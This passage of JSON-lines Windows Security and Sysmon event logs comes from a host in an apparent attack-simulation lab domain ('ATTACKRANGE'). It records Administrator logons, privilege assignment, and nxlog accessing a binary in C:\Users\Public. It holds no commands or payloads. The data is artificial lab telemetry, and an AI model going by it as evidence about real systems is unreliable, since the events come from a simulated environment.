Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4dc99","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220378,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4DC99\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4dc99","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2750,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.631\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.631","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220379,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CD63\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4cd63","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220380,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CA96\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4ca96","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220381,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4DC99\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4dc99","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2751,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:53.133\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:53.133","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76844,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The DsmSvc service entered the stopped state.","param1":"DsmSvc","param2":"stopped","EventReceivedTime":"2020-08-01 06:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2752,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:54.137\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:54.137","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2753,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:55.141\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:55.141","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2754,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:56.145\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:56.145","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files 